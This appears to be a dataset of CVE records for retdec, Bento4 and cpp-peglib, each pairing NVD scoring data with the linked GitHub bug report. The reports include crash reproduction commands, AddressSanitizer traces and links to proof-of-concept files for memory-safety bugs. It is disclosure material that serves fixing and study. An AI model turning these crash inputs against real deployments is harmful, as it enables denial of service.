![7](https://user-images.githubusercontent.com/81484562/114713791-e892af00-9d4a-11eb-9b67-eafee7ae5933.JPG)
Stored XSS vulnerability in staff/my-profile.php
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/16/comments
2
2021-04-14T12:58:52Z
2021-04-23T20:23:13Z
https://github.com/remoteclinic/RemoteClinic/issues/16
857,873,596
16
1,868
CVE-2020-23907
2021-04-21T18:15:08.173
An issue was discovered in retdec v3.3. In function canSplitFunctionOn() of ir_modifications.cpp, there is a possible out of bounds read due to a heap buffer overflow. The impact is: Deny of Service, Memory Disclosure, and Possible Code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/avast/retdec/commit/517298bafaaff0a8e3dd60dd055a67c41b545807" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/avast/retdec/issues/637" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/avast/retdec/commit/517298bafaaff0a8e3dd60dd055a67c41b545807" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/avast/retdec/issues/637" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:retdec:3.3:*:*:*:*:*:*:*", "matchCriteriaId": "11698B96-5CD8-4793-A92B-02DBFD231D7D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/avast/retdec/issues/637
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "avast", "retdec" ]
I try to translate the following PE file: [pe-Windows-x86-cmd.zip](https://github.com/avast/retdec/files/3574397/pe-Windows-x86-cmd.zip) But in the decoder phase, the retdec just gets an error and exits: <img width="1172" alt="屏幕快照 2019-09-04 19 57 03" src="https://user-images.githubusercontent.com/15180789/64253054-02ed8f80-cf4f-11e9-838d-b206bbd673ab.png"> The problem is in file `src/bin2llvmir/optimizations/decoder/ir_modifications.cpp`, function `Decoder::canSplitFunctionOn`, line 426 and line 445, two portions of code: ``` ... auto up = fncStarts.upper_bound(bAddr); --up; Address bFnc = *up; ... auto up = fncStarts.upper_bound(pAddr); --up; Address pFnc = *up; ... ``` The problem here is, if `up` equals to `fncStarts.begin()`, the `--up` will crash, the possible fix is: ``` auto up = fncStarts.upper_bound(bAddr); if (up == fncStarts.begin()) { return false; } --up; uint64_t bFnc = *up; ``` After this fix, the Decoder works well: <img width="1169" alt="屏幕快照 2019-09-04 19 59 56" src="https://user-images.githubusercontent.com/15180789/64253942-f1a58280-cf50-11e9-960d-a715b683ea97.png">
Bug in bin2llvmir Decoder
https://api.github.com/repos/avast/retdec/issues/637/comments
2
2019-09-04T12:18:20Z
2019-09-10T13:31:44Z
https://github.com/avast/retdec/issues/637
489,124,727
637
1,869
CVE-2020-23912
2021-04-21T18:15:08.207
An issue was discovered in Bento4 through v1.6.0-637. A NULL pointer dereference exists in the function AP4_StszAtom::GetSampleSize() located in Ap4StszAtom.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/540" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/540" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "9684D8EA-E280-40A0-BB75-E7AFB950B234", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-637", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/540
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), mp42aac (latest master [174b94](https://github.com/axiomatic-systems/Bento4/commit/174b948be29b69009b235ae0aa92884d05bcea49)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/mp42aac ./Bento4/SEGV-GetSampleSize-Ap4StszAtom-154 -o /dev/null ## Output ``` Audio Track: duration: 3623 ms sample count: 2147483726 Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==64813==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000068ee18 bp 0x7ffd9fff70c0 sp 0x7ffd9fff6ef0 T0) ==64813==The signal is caused by a READ memory access. ==64813==Hint: address points to the zero page. #0 0x68ee17 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 #1 0x5b166c in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp #2 0x564f45 in AP4_Track::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:435:43 #3 0x564f45 in AP4_Track::ReadSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:469 #4 0x51826d in WriteSamples(AP4_Track*, AP4_SampleDescription*, AP4_ByteStream*) /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:192:12 #5 0x51826d in main /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:281 #6 0x7f7ae36e1b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41afc9 in _start (/home/seviezhou/Bento4/build/mp42aac+0x41afc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==64813==ABORTING ``` ## POC [SEGV-GetSampleSize-Ap4StszAtom-154.zip](https://github.com/axiomatic-systems/Bento4/files/5009742/SEGV-GetSampleSize-Ap4StszAtom-154.zip)
A Segmentation fault in Ap4StszAtom.cpp:154
https://api.github.com/repos/axiomatic-systems/Bento4/issues/540/comments
0
2020-08-01T02:45:57Z
2020-08-01T02:45:57Z
https://github.com/axiomatic-systems/Bento4/issues/540
670,451,905
540
1,870
CVE-2020-23914
2021-04-21T18:15:08.237
An issue was discovered in cpp-peglib through v0.1.12. A NULL pointer dereference exists in the peg::AstOptimizer::optimize() located in peglib.h. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/commit/0061f393de54cf0326621c079dc2988336d1ebb3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/issues/121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/commit/0061f393de54cf0326621c079dc2988336d1ebb3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/issues/121" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cpp-peglib_project:cpp-peglib:*:*:*:*:*:*:*:*", "matchCriteriaId": "7E9A6A5B-E857-44B5-B9C0-8DA8E21A075E", "versionEndExcluding": null, "versionEndIncluding": "0.1.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/yhirose/cpp-peglib/issues/121
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yhirose", "cpp-peglib" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), peglint (latest master [14305f](https://github.com/yhirose/cpp-peglib/commit/14305f9f53cde207568f21675a1b9294a3ab28b4)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/lint/peglint --ast --opt @@ ./pl0/samples/fib.pas ## Output ``` Segmentation fault ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==67168==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000d8 (pc 0x000000504159 bp 0x0fffe1f65aa4 sp 0x7fff0fb2d380 T0) #0 0x504158 in std::vector<std::shared_ptr<peg::AstBase<peg::EmptyType> >, std::allocator<std::shared_ptr<peg::AstBase<peg::EmptyType> > > >::size() const /usr/include/c++/5/bits/stl_vector.h:655 #1 0x504158 in std::shared_ptr<peg::AstBase<peg::EmptyType> > peg::AstOptimizer::optimize<peg::AstBase<peg::EmptyType> >(std::shared_ptr<peg::AstBase<peg::EmptyType> >, std::shared_ptr<peg::AstBase<peg::EmptyType> >) /home/seviezhou/cpppeglib/lint/../peglib.h:3650 #2 0x42aa14 in main /home/seviezhou/cpppeglib/lint/peglint.cc:178 #3 0x7fe349ce283f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x42b888 in _start (/home/seviezhou/cpppeglib/build/lint/peglint+0x42b888) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /usr/include/c++/5/bits/stl_vector.h:655 std::vector<std::shared_ptr<peg::AstBase<peg::EmptyType> >, std::allocator<std::shared_ptr<peg::AstBase<peg::EmptyType> > > >::size() const ==67168==ABORTING ``` ## POC [SEGV-optimize-peglib-3650.zip](https://github.com/yhirose/cpp-peglib/files/5040870/SEGV-optimize-peglib-3650.zip)
A Segmentation fault in peglib.h:3650
https://api.github.com/repos/yhirose/cpp-peglib/issues/121/comments
5
2020-08-07T10:34:08Z
2021-07-20T10:49:42Z
https://github.com/yhirose/cpp-peglib/issues/121
674,925,269
121
1,871
CVE-2020-23915
2021-04-21T18:15:08.270
An issue was discovered in cpp-peglib through v0.1.12. peg::resolve_escape_sequence() in peglib.h has a heap-based buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/commit/b3b29ce8f3acf3a32733d930105a17d7b0ba347e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/commit/b3b29ce8f3acf3a32733d930105a17d7b0ba347e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yhirose/cpp-peglib/issues/122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cpp-peglib_project:cpp-peglib:*:*:*:*:*:*:*:*", "matchCriteriaId": "7E9A6A5B-E857-44B5-B9C0-8DA8E21A075E", "versionEndExcluding": null, "versionEndIncluding": "0.1.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/yhirose/cpp-peglib/issues/122
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yhirose", "cpp-peglib" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), peglint (latest master [14305f](https://github.com/yhirose/cpp-peglib/commit/14305f9f53cde207568f21675a1b9294a3ab28b4)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/lint/peglint --ast --opt ./heap-overflow-resolve_escape_sequence-peglib-347 ./pl0/samples/fib.pas ## AddressSanitizer output ``` ================================================================= ==23131==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00001f71b at pc 0x000000459cbd bp 0x7ffc8a717b10 sp 0x7ffc8a717b00 READ of size 1 at 0x61a00001f71b thread T0 #0 0x459cbc in peg::resolve_escape_sequence[abi:cxx11](char const*, unsigned long) /home/seviezhou/cpppeglib/lint/../peglib.h:347 #1 0x45a12a in peg::ParserGenerator::setup_actions()::{lambda(peg::SemanticValues const&)#18}::operator()[abi:cxx11](peg::SemanticValues const&) const /home/seviezhou/cpppeglib/lint/../peglib.h:3304 #2 0x45a12a in std::_Function_handler<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > (peg::SemanticValues const&), peg::ParserGenerator::setup_actions()::{lambda(peg::SemanticValues const&)#18}>::_M_invoke(std::_Any_data const&, peg::SemanticValues const&) /usr/include/c++/5/functional:1857 #3 0x4fb935 in std::function<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > (peg::SemanticValues const&)>::operator()(peg::SemanticValues const&) const /usr/include/c++/5/functional:2267 #4 0x4fb935 in peg::any peg::call<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > (peg::SemanticValues const&)>, (decltype(nullptr))0, peg::SemanticValues&>(std::function<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > (peg::SemanticValues const&)>, peg::SemanticValues&) /home/seviezhou/cpppeglib/lint/../peglib.h:631 #5 0x4fb935 in peg::Action::TypeAdaptor_csv<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >::operator()(peg::SemanticValues&, peg::any&) /home/seviezhou/cpppeglib/lint/../peglib.h:691 #6 0x4fb935 in std::_Function_handler<peg::any (peg::SemanticValues&, peg::any&), peg::Action::TypeAdaptor_csv<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_invoke(std::_Any_data const&, peg::SemanticValues&, peg::any&) /usr/include/c++/5/functional:1857 #7 0x4904d6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x4904d6) #8 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #9 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #10 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #11 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #12 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #13 0x4a90fa in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #14 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #15 0x4ddae7 in peg::PrioritizedChoice::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1058 #16 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #17 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #18 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #19 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #20 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #21 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #22 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #23 0x4a933a in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #24 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #25 0x4df989 in peg::Repetition::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1125 #26 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #27 0x469b21 in peg::TokenBoundary::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2464 #28 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #29 0x4a95d1 in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #30 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #31 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #32 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #33 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #34 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #35 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #36 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #37 0x4ddae7 in peg::PrioritizedChoice::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1058 #38 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #39 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #40 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #41 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #42 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #43 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #44 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #45 0x4a90fa in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #46 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #47 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #48 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #49 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #50 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #51 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #52 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #53 0x4a933a in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #54 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #55 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #56 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) 